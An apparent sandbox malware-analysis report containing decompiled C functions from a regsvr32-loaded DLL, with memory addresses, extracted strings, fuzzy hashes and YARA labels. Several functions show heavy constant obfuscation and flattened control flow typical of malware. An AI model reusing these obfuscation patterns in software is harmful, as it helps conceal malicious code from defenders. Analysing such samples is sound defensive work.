0x1000947a
0x10009482
0x00000000
0x10009482
0x1000944f
0x10009447
0x1000943f
0x10009568
0x10009573
0x10009573
0x100094af
0x100094b8
0x100094bc
0x1000950a
0x1000952b
0x1000952e
0x10009533
0x10009536
0x1000953d
0x1000953e
0x1000953e
0x00000000
0x1000954a
0x10009428

Strings

GR, xrefs: 10009183
*9O, xrefs: 100092EF
nQ;, xrefs: 10009302
d, xrefs: 10009387
,, xrefs: 100091F7
10, xrefs: 1000928A
y!w, xrefs: 100093FC

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *9O$10$d$nQ;$y!w$GR$,
API String ID: 0-952755987
Opcode ID: ca1bab49c2fe185d5c030c3a01b2f19b47b6d685ff7fe8b57310a8494b6779c9
Instruction ID: c2befc67c17d9a4019bd22c4164c1ff288253fc5f2c1508e6ae8121efe5d4a24
Opcode Fuzzy Hash: ca1bab49c2fe185d5c030c3a01b2f19b47b6d685ff7fe8b57310a8494b6779c9
Instruction Fuzzy Hash: EAB1E0725083809FD358CF65D88A90BFBE1FBC4798F50891DF6A986260D3B5CA49CF46

Uniqueness

Uniqueness Score: -1.00%

Function 10021E19 Relevance: 9.0, Strings: 7, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E10021E19(void* __ecx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t214;
				void* _t217;
				void* _t221;
				void* _t225;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v100;
				_t234 = __ecx;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xfd3992;
				_v8 = 0x74b231;
				_v64 = 0x1d9bd1;
				_v64 = _v64 + 0xd5e3;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x003ce368;
				_v44 = 0xaf3920;
				_v44 = _v44 + 0xffff39fc;
				_v44 = _v44 ^ 0xe6c94e7f;
				_v44 = _v44 ^ 0xe662c2d4;
				_v48 = 0x73505a;
				_v48 = _v48 ^ 0xe60be9be;
				_v48 = _v48 + 0xffff2c73;
				_v48 = _v48 ^ 0xe671161f;
				_v20 = 0x237437;
				_v20 = _v20 + 0xdf72;
				_v20 = _v20 ^ 0x00255173;
				_v52 = 0xc7dc06;
				_v52 = _v52 + 0xffff9355;
				_v52 = _v52 + 0x37a6;
				_v52 = _v52 ^ 0x00c616b9;
				_v84 = 0x49c0e0;
				_v84 = _v84 + 0xffff3352;
				_t249 = 0x6f6ae0d;
				_t236 = 0x43;
				_v84 = _v84 / _t236;
				_v84 = _v84 + 0xbf65;
				_v84 = _v84 ^ 0x0008e2a8;
				_v88 = 0xeee3ed;
				_t52 =  &_v88; // 0xeee3ed
				_t237 = 0x72;
				_v88 =  *_t52 / _t237;
				_v88 = _v88 + 0x9416;
				_v88 = _v88 + 0x95b1;
				_v88 = _v88 ^ 0x000678b3;
				_v96 = 0x48194f;
				_v96 = _v96 | 0xf3befdfd;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0xfdfde77f;
				_v100 = 0x2429bd;
				_v100 = _v100 << 1;
				_v100 = _v100 << 0xd;
				_v100 = _v100 + 0xad6e;
				_v100 = _v100 ^ 0x0a6ae0c2;
				_v36 = 0xac9774;
				_v36 = _v36 << 0xc;
				_v36 = _v36 ^ 0xc97edbc1;
				_v24 = 0xe72b01;
				_v24 = _v24 + 0xffffd38a;
				_v24 = _v24 ^ 0x00e34387;
				_v28 = 0x340a99;
				_v28 = _v28 + 0x479e;
				_v28 = _v28 ^ 0x0031d361;
				_v92 = 0x21c9e8;
				_v92 = _v92 * 0x1f;
				_v92 = _v92 ^ 0xe232fdb5;
				_v92 = _v92 + 0xffff13d8;
				_v92 = _v92 ^ 0xe6260721;
				_v56 = 0x1c39ed;
				_v56 = _v56 ^ 0xb8e39a30;
				_v56 = _v56 * 0x43;
				_v56 = _v56 ^ 0x6aebb659;
				_v60 = 0xc1eb15;
				_v60 = _v60 + 0xeead;
				_v60 = _v60 << 0x10;
				_v60 = _v60 ^ 0xd9c9e805;
				_v32 = 0xae281c;
				_v32 = _v32 | 0xb91c151f;
				_v32 = _v32 ^ 0xb9b8eff1;
				_v72 = 0x25ada;
				_v72 = _v72 + 0xc23;
				_t238 = 0x58;
				_v72 = _v72 / _t238;
				_v72 = _v72 * 0x55;
				_v72 = _v72 ^ 0x0007289c;
				_v76 = 0x4722ef;
				_v76 = _v76 + 0xffffe650;
				_v76 = _v76 | 0x0cf1abd4;
				_v76 = _v76 + 0xffff17bd;
				_v76 = _v76 ^ 0x0cf1fab9;
				_v80 = 0x6039fc;
				_v80 = _v80 * 0x6c;
				_v80 = _v80 ^ 0x01ddcd7f;
				_v80 = _v80 + 0x2f00;
				_v80 = _v80 ^ 0x2947cb32;
				_v16 = 0x9f582a;
				_v16 = _v16 + 0x4761;
				_v16 = _v16 ^ 0x0095c171;
				_t248 = _v16;
				_v68 = 0x4d5ee9;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x94a74372;
				_v68 = _v68 * 6;
				_v68 = _v68 ^ 0x7bed06ce;
				_v40 = 0x633688;
				_v40 = _v40 ^ 0x40d35a88;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x0811051d;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0x922abad;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t221 = E10015958();
							_t251 =  &(_t251[2]);
							_t249 = 0x76c6c85;
							_t248 = _t248 + _t221;
							continue;
						} else {
							if(_t249 == 0x405e2f0) {
								_push(_t238);
								_push(_t238);
								_t225 = E10015958();
								_t251 =  &(_t251[2]);
								_t249 = 0x44da2b6;
								_t248 = _t248 + _t225;
								continue;
							} else {
								if(_t249 == 0x44da2b6) {
									_push(_t238);
									_push(_t238);
									_t229 = E10015958();
									_t251 =  &(_t251[2]);
									_t249 = 0xce38a13;
									_t248 = _t248 + _t229;
									continue;
								} else {
									if(_t249 == 0x6f6ae0d) {
										_t248 = _v64;
										_t249 = 0xf5f0ea3;
										continue;
									} else {
										if(_t249 != 0x76c6c85) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E10015958();
											_t251 =  &(_t251[2]);
											_t249 = 0x405e2f0;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xce38a13) {
						_push(_t238);
						_push(_t238);
						_t214 = E10015958();
						_t251 =  &(_t251[2]);
						_t249 = 0xf0f81f4;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xf0f81f4) {
							_t248 = _t248 + E1000D532(_t234 + 0x14, _v16, _v68, _v40);
						} else {
							if(_t249 != 0xf5f0ea3) {
								goto L17;
							} else {
								_t238 = _t234 + 0x4c;
								_t217 = E1000D532(_t238, _v44, _v48, _v20);
								_t251 =  &(_t251[2]);
								_t249 = 0x922abad;
								_t248 = _t248 + _t217;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xe74df88);
				goto L20;
			}

0x10021e19
0x10021e20
0x10021e22
0x10021e29
0x10021e31
0x10021e39
0x10021e41
0x10021e49
0x10021e4d
0x10021e55
0x10021e5d
0x10021e65
0x10021e6d
0x10021e75
0x10021e7d
0x10021e85
0x10021e8d
0x10021e95
0x10021e9d
0x10021ea5
0x10021ead
0x10021eb5
0x10021ebd
0x10021ec5
0x10021ecd
0x10021ed5
0x10021ee3
0x10021ee8
0x10021eed
0x10021ef3
0x10021efb
0x10021f03
0x10021f0b
0x10021f0f
0x10021f12
0x10021f16
0x10021f1e
0x10021f26
0x10021f2e
0x10021f36
0x10021f3e
0x10021f43
0x10021f4b
0x10021f53
0x10021f57
0x10021f5c
0x10021f64
0x10021f6c
0x10021f74
0x10021f79
0x10021f81
0x10021f89
0x10021f91
0x10021f99
0x10021fa1
0x10021fa9
0x10021fb1
0x10021fbe
0x10021fc2
0x10021fca
0x10021fd2
0x10021fda
0x10021fe2
0x10021fef
0x10021ff3
0x10021ffb
0x10022003
0x1002200b
0x10022010
0x10022018
0x10022022
0x1002202f
0x10022037
0x1002203f
0x1002204d
0x10022050
0x10022059
0x1002205d
0x10022065
0x1002206d
0x10022075
0x1002207d
0x10022085
0x1002208d
0x1002209a
0x1002209e
0x100220a6
0x100220ae
0x100220b6
0x100220be
0x100220c6
0x100220ce
0x100220d2
0x100220da
0x100220df
0x100220ec
0x100220f0
0x100220f8
0x10022100
0x10022108
0x1002210d
0x1002210d
0x10022115
0x10022115
0x10022115
0x10022115
0x10022117
0x00000000
0x00000000
0x1002211d
0x100221be
0x100221bf
0x100221c0
0x100221c5
0x100221c8
0x100221cd
0x00000000
0x10022123
0x10022129
0x1002219c
0x1002219d
0x1002219e
0x100221a3
0x100221a6
0x100221ab
0x00000000
0x1002212b
0x10022131
0x1002217d
0x1002217e
0x1002217f
0x10022184
0x10022187
0x1002218c
0x00000000
0x10022133
0x10022139
0x10022166
0x1002216a
0x00000000
0x1002213b
0x10022141
0x00000000
0x10022147
0x10022153
0x10022154
0x10022155
0x1002215a
0x1002215d
0x10022162
0x00000000
0x10022162
0x10022141
0x10022139
0x10022131
0x10022129
0x10022250
0x10022259
0x10022259
0x100221da
0x10022218
0x10022219
0x1002221a
0x1002221f
0x10022222
0x10022227
0x00000000
0x100221dc
0x100221e2
0x1002224e
0x100221e4
0x100221ea
0x00000000
0x100221ec
0x100221f0
0x100221fb
0x10022200
0x10022203
0x10022205
0x00000000
0x10022205
0x100221ea
0x100221e2
0x00000000
0x10022229
0x10022229
0x00000000

Strings

^M, xrefs: 100220D2
ZPs, xrefs: 10021E75
"G, xrefs: 10022065
sQ%, xrefs: 10021EA5
, xrefs: 10021F0B
aG, xrefs: 100220BE
h<, xrefs: 10021E4D

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ZPs$aG$h<$sQ%$"G$^M$
API String ID: 0-965419043
Opcode ID: 712781e0f647ad3be223441e6d66dc7755b616d9c435e3b0bf9cc5a7205c25ca
Instruction ID: dabc0d6805077da3991c36aaf302a3fa16b42cf8beab571b1fa0c96c4f92ea06
Opcode Fuzzy Hash: 712781e0f647ad3be223441e6d66dc7755b616d9c435e3b0bf9cc5a7205c25ca
Instruction Fuzzy Hash: D0B135B28093419FC394CF65D58A40FFBE0FBA4358F504A1DF99AA6260D3B5DA188F47

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4621B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6DA4621B(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				signed int _t37;
				void* _t39;
				void* _t40;
				signed int _t45;
				void* _t46;

				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0x6da82744; // 0x616b45bb
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E6DA43451(_t31, E6DA5D43A(__edx,  &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E6DA5CC92(_t49));
					 *(E6DA5CC92(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E6DA5CC2F( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E6DA5CC92(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E6DA5CC92(__eflags)) = _t37;
					} else {
						E6DA3DD9A( *((intOrPtr*)(E6DA5CC92(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E6DA59DE2(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}

0x6da4621b
0x6da4621b
0x6da4621e
0x6da46220
0x6da46226
0x6da4622d
0x6da46230
0x6da46239
0x6da4623b
0x6da46243
0x6da4626b
0x6da4626d
0x00000000
0x00000000
0x00000000
0x00000000
0x6da46245
0x6da46253
0x6da46258
0x6da4626f
0x6da4626f
0x6da46275
0x6da4627c
0x6da46285
0x6da462a2
0x6da462a4
0x6da462a9
0x6da462ac
0x6da462c2
0x6da462ae
0x6da462b5
0x6da462ba
0x6da462c4
0x6da462c8
0x6da462dd
0x6da462dd
0x6da462dd
0x6da462ce
0x6da462d5
0x6da462d5
0x6da462c8
0x6da462e2
0x6da462e5
0x6da462ec

APIs

_strcpy_s.LIBCMT ref: 6DA4624D

Part of subcall function 6DA5CC92: __getptd_noexit.LIBCMT ref: 6DA5CC92

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 6DA46265
__snwprintf_s.LIBCMT ref: 6DA4629A
LoadLibraryA.KERNEL32(?), ref: 6DA462D5

Strings

LOC, xrefs: 6DA46245

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1155623865-519433814
Opcode ID: 7e2467c6eb87ada1c0d3dc955433f05a3ba20277c5a12cdd88c9c44865e980c5
Instruction ID: 7e33e2bc18e058da24990efd24ef66de8aeb1ab3ac2ab171a6dde61a2bba3088
Opcode Fuzzy Hash: 7e2467c6eb87ada1c0d3dc955433f05a3ba20277c5a12cdd88c9c44865e980c5
Instruction Fuzzy Hash: 0521E47194C328BBDB119B64CD41BE933B8BB42315F1AC461E30597190EB349DC587E2

Uniqueness

Uniqueness Score: -1.00%

Function 1001A4B5 Relevance: 7.8, Strings: 6, Instructions: 257
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E1001A4B5(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t246;
				void* _t269;
				void* _t271;
				intOrPtr _t277;
				intOrPtr* _t279;
				void* _t281;
				intOrPtr* _t303;
				intOrPtr* _t305;
				intOrPtr _t308;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int* _t320;

				_t279 = _a12;
				_t310 = _a4;
				_push(_a16);
				_push(_t279);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t246);
				_v16 = 0x703306;
				_t308 = 0;
				_v12 = 0xd9904b;
				_t320 =  &(( &_v124)[6]);
				_v8 = 0;
				_v104 = 0xd6368d;
				_t281 = 0x8d51520;
				_v104 = _v104 + 0xffff0898;
				_v104 = _v104 << 8;
				_t311 = 0x3f;
				_v104 = _v104 * 0x71;
				_v104 = _v104 ^ 0x20df5501;
				_v88 = 0x5aebdb;
				_v88 = _v88 + 0xffff6bf0;
				_v88 = _v88 | 0x23bc5d6e;
				_v88 = _v88 ^ 0x23fe5fee;
				_v36 = 0x7b93d3;
				_v36 = _v36 << 3;
				_v36 = _v36 ^ 0x03dc9e98;
				_v48 = 0x7fa5a7;
				_v48 = _v48 / _t311;
				_v48 = _v48 ^ 0x000206b1;
				_v28 = 0x6af216;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x0001abc8;
				_v56 = 0x8be78;
				_v56 = _v56 ^ 0x2c543c5a;
				_v56 = _v56 ^ 0x2c5c8222;
				_v76 = 0xdd2e90;
				_t312 = 0x2c;
				_v76 = _v76 / _t312;
				_v76 = _v76 >> 2;
				_v76 = _v76 ^ 0x000141b8;
				_v32 = 0x5a546e;
				_t313 = 0x78;
				_v32 = _v32 * 0x27;
				_v32 = _v32 ^ 0x0dcfed8a;
				_v40 = 0x55ad88;
				_v40 = _v40 | 0x2cb2d29e;
				_v40 = _v40 ^ 0x2cf4af71;
				_v100 = 0x23dfdb;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 + 0x6cb8;
				_v100 = _v100 + 0x6f44;
				_v100 = _v100 ^ 0x0003c10a;
				_v44 = 0x73bd7;
				_v44 = _v44 + 0xabbf;
				_v44 = _v44 ^ 0x000d48a9;
				_v108 = 0x39c662;
				_v108 = _v108 / _t313;
				_v108 = _v108 << 0xf;
				_v108 = _v108 ^ 0x201d04c9;
				_v108 = _v108 ^ 0x1db3e1f8;
				_v68 = 0x12457d;
				_v68 = _v68 << 3;
				_v68 = _v68 | 0x765694b5;
				_v68 = _v68 ^ 0x76d6696d;
				_v72 = 0x2db85;
				_v72 = _v72 << 6;
				_t314 = 0x5a;
				_v72 = _v72 * 0x4f;
				_v72 = _v72 ^ 0x386acd72;
				_v60 = 0xfd9d;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x000f033b;
				_v124 = 0x74e423;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 / _t314;
				_v124 = _v124 | 0x17c338f6;
				_v124 = _v124 ^ 0x17c2dffe;
				_v80 = 0x3efc6f;
				_v80 = _v80 >> 9;
				_v80 = _v80 << 0xc;
				_v80 = _v80 ^ 0x01f38ae0;
				_v112 = 0x557cdf;
				_t315 = 0x1c;
				_v112 = _v112 / _t315;
				_v112 = _v112 + 0x6e1d;
				_v112 = _v112 + 0xffff6355;
				_v112 = _v112 ^ 0x000f457f;
				_v52 = 0x326530;
				_v52 = _v52 | 0x4d871f9a;
				_v52 = _v52 ^ 0x4db60529;
				_v84 = 0x98e07d;
				_t316 = 0x23;
				_v84 = _v84 * 0x7e;
				_v84 = _v84 / _t316;
				_v84 = _v84 ^ 0x0226ddf7;
				_v116 = 0x8562e9;
				_v116 = _v116 | 0xece899b8;
				_v116 = _v116 ^ 0x75744f8f;
				_t317 = 0x13;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x99a8ef19;
				_v92 = 0x90510c;
				_v92 = _v92 ^ 0x8fcfa690;
				_v92 = _v92 + 0xb862;
				_v92 = _v92 ^ 0x8f6165ee;
				_v120 = 0x7e6b68;
				_v120 = _v120 | 0x4a3bbe39;
				_v120 = _v120 * 0x7c;
				_v120 = _v120 / _t317;
				_v120 = _v120 ^ 0x01234417;
				_v64 = 0xd489d3;
				_v64 = _v64 + 0xffff68bc;
				_v64 = _v64 + 0xa43;
				_v64 = _v64 ^ 0x00d2d0b5;
				_v96 = 0xdebe63;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 + 0x653;
				_v96 = _v96 + 0xffff4a94;
				_v96 = _v96 ^ 0xfff40c0b;
				do {
					while(_t281 != 0xb171b1) {
						if(_t281 == 0x509ff49) {
							_t305 =  *0x1002420c; // 0x0
							_t271 = E1001E436(_v80,  *_t305, _v20, _t281, _v112, _v52,  *_t310, _t281, _v84, _v56, _v88, _v116, _v92,  *((intOrPtr*)(_t310 + 4)), _v120,  &_v20, _v24);
							_t320 =  &(_t320[0xf]);
							if(_t271 == _v76) {
								 *_t279 = _v24;
								_t308 = 1;
								 *((intOrPtr*)(_t279 + 4)) = _v20;
							} else {
								_t281 = 0xf27ccb6;
								continue;
							}
						} else {
							if(_t281 == 0x8d51520) {
								_t281 = 0xb171b1;
								continue;
							} else {
								if(_t281 == 0xf0f9328) {
									_push(_t281);
									_t277 = E1001EAA3(_v20);
									_v24 = _t277;
									if(_t277 != 0) {
										_t281 = 0x509ff49;
										continue;
									}
								} else {
									if(_t281 != 0xf27ccb6) {
										goto L15;
									} else {
										E10006A8D(_v64, _v96, _v24);
									}
								}
							}
						}
						L18:
						return _t308;
					}
					_t303 =  *0x1002420c; // 0x0
					_t269 = E1001E436(_v32,  *_t303, _v36, _t281, _v40, _v100,  *_t310, _t281, _v44, _v48, _v104, _v108, _v68,  *((intOrPtr*)(_t310 + 4)), _v72,  &_v20, _t308);
					_t320 =  &(_t320[0xf]);
					if(_t269 != _v28) {
						_t281 = 0x1c3b3db;
						goto L15;
					} else {
						_t281 = 0xf0f9328;
						continue;
					}
					goto L18;
					L15:
				} while (_t281 != 0x1c3b3db);
				goto L18;
			}

0x1001a4b9
0x1001a4c2
0x1001a4ca
0x1001a4d1
0x1001a4d2
0x1001a4d9
0x1001a4da
0x1001a4db
0x1001a4dc
0x1001a4e1
0x1001a4ec
0x1001a4ee
0x1001a4f9
0x1001a4fc
0x1001a505
0x1001a50d
0x1001a512
0x1001a51a
0x1001a526
0x1001a529
0x1001a52d
0x1001a535
0x1001a53d
0x1001a545
0x1001a54d
0x1001a555
0x1001a55d
0x1001a562
0x1001a56a
0x1001a57a
0x1001a57e
0x1001a586
0x1001a58e
0x1001a593
0x1001a59b
0x1001a5a3
0x1001a5ab
0x1001a5b3
0x1001a5bf
0x1001a5c4
0x1001a5ca
0x1001a5cf
0x1001a5d7
0x1001a5e4
0x1001a5e5
0x1001a5e9
0x1001a5f1
0x1001a5f9
0x1001a601
0x1001a609
0x1001a611
0x1001a616
0x1001a61e
0x1001a626
0x1001a62e
0x1001a636
0x1001a63e
0x1001a646
0x1001a654
0x1001a658
0x1001a65d
0x1001a665
0x1001a66d
0x1001a675
0x1001a67c
0x1001a684
0x1001a68c
0x1001a694
0x1001a6a0
0x1001a6a3
0x1001a6a7
0x1001a6af
0x1001a6b7
0x1001a6bc
0x1001a6c4
0x1001a6cc
0x1001a6d9
0x1001a6dd
0x1001a6e5
0x1001a6ed
0x1001a6f5
0x1001a6fa
0x1001a6ff
0x1001a707
0x1001a713
0x1001a718
0x1001a71e
0x1001a726
0x1001a72e
0x1001a736
0x1001a73e
0x1001a746
0x1001a74e
0x1001a75b
0x1001a75e
0x1001a76a
0x1001a76e
0x1001a776
0x1001a77e
0x1001a786
0x1001a793
0x1001a794
0x1001a798
0x1001a7a0
0x1001a7a8
0x1001a7b0
0x1001a7b8
0x1001a7c0
0x1001a7c8
0x1001a7d5
0x1001a7e4
0x1001a7e8
0x1001a7f0
0x1001a7f8
0x1001a800
0x1001a808
0x1001a810
0x1001a818
0x1001a81d
0x1001a825
0x1001a82d
0x1001a835
0x1001a835
0x1001a843
0x1001a8d4
0x1001a8e8
0x1001a8ed
0x1001a8f4
0x1001a97a
0x1001a97c
0x1001a981
0x1001a8f6
0x1001a8f6
0x00000000
0x1001a8f6
0x1001a845
0x1001a84b
0x1001a89e
0x00000000
0x1001a84d
0x1001a853
0x1001a880
0x1001a885
0x1001a88a
0x1001a891
0x1001a897
0x00000000
0x1001a897
0x1001a855
0x1001a85b
0x00000000
0x1001a861
0x1001a86d
0x1001a872
0x1001a85b
0x1001a853
0x1001a84b
0x1001a984
0x1001a98d
0x1001a98d
0x1001a93a
0x1001a949
0x1001a94e
0x1001a955
0x1001a961
0x00000000
0x1001a957
0x1001a957
0x00000000
0x1001a957
0x00000000
0x1001a966
0x1001a966
0x00000000

Strings

0e2, xrefs: 1001A736
C, xrefs: 1001A800
hk~, xrefs: 1001A7C0
Z<T,, xrefs: 1001A5A3
nTZ, xrefs: 1001A5D7
Do, xrefs: 1001A61E

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0e2$C$Do$Z<T,$hk~$nTZ
API String ID: 0-699481322
Opcode ID: a34c0973414a0e89e85f6624be8e96f6906b1bc93a20b5a6b8f82d8e672da2a2
Instruction ID: 10b88ab1e5de318b155674c26b752f1a2f6010993ef9502c8ad9462ff1a830d5
Opcode Fuzzy Hash: a34c0973414a0e89e85f6624be8e96f6906b1bc93a20b5a6b8f82d8e672da2a2
Instruction Fuzzy Hash: 14C1EE715083819FC768CF62C88991BBBF1FB85748F104A1DF6959A220D7B6C988CF17

Uniqueness

Uniqueness Score: -1.00%

Function 1000CED8 Relevance: 7.7, Strings: 6, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000CED8(void* __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				void* _t261;
				void* _t262;
				signed int* _t265;
				signed int* _t266;

				_t265 =  &_v104;
				_v44 = 0xc63de3;
				_v44 = _v44 | 0x0b884fad;
				_t261 = __edx;
				_t239 = __ecx;
				_t262 = 0x3de9b9f;
				_t241 = 0x74;
				_v44 = _v44 / _t241;
				_v44 = _v44 ^ 0x001a0e58;
				_v48 = 0xe83823;
				_v48 = _v48 | 0xa9e6db2c;
				_v48 = _v48 + 0xffff789c;
				_v48 = _v48 ^ 0xa9ee73cb;
				_v32 = 0x96368e;
				_v32 = _v32 + 0x298f;
				_v32 = _v32 ^ 0x0097402a;
				_v68 = 0xf7f5f9;
				_v68 = _v68 << 1;
				_v68 = _v68 ^ 0x763f3734;
				_v68 = _v68 ^ 0x77da3e70;
				_v36 = 0x546458;
				_v36 = _v36 | 0x22a4a593;
				_v36 = _v36 ^ 0x22f189b4;
				_v40 = 0x9e6ed3;
				_v40 = _v40 + 0xffff6551;
				_v40 = _v40 ^ 0x009030e5;
				_v104 = 0x3f1909;
				_v104 = _v104 >> 1;
				_v104 = _v104 + 0xca0a;
				_v104 = _v104 + 0xf825;
				_v104 = _v104 ^ 0x002843a0;
				_v60 = 0x907ce5;
				_v60 = _v60 << 1;
				_v60 = _v60 + 0x9314;
				_v60 = _v60 ^ 0x01271398;
				_v28 = 0xa6b267;
				_v28 = _v28 | 0x66fce64f;
				_v28 = _v28 ^ 0x66f8936b;
				_v64 = 0xb67175;
				_v64 = _v64 + 0xc906;
				_v64 = _v64 ^ 0x14caeca9;
				_v64 = _v64 ^ 0x147c666d;
				_v20 = 0x88c99f;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x044509fe;
				_v24 = 0xb544b2;
				_v24 = _v24 + 0xffff6e00;
				_v24 = _v24 ^ 0x00b5ff90;
				_v56 = 0xb8eaa8;
				_v56 = _v56 >> 0xe;
				_v56 = _v56 + 0xa04;
				_v56 = _v56 ^ 0x0000da9a;
				_v100 = 0x8d03eb;
				_v100 = _v100 << 5;
				_v100 = _v100 + 0xbbd0;
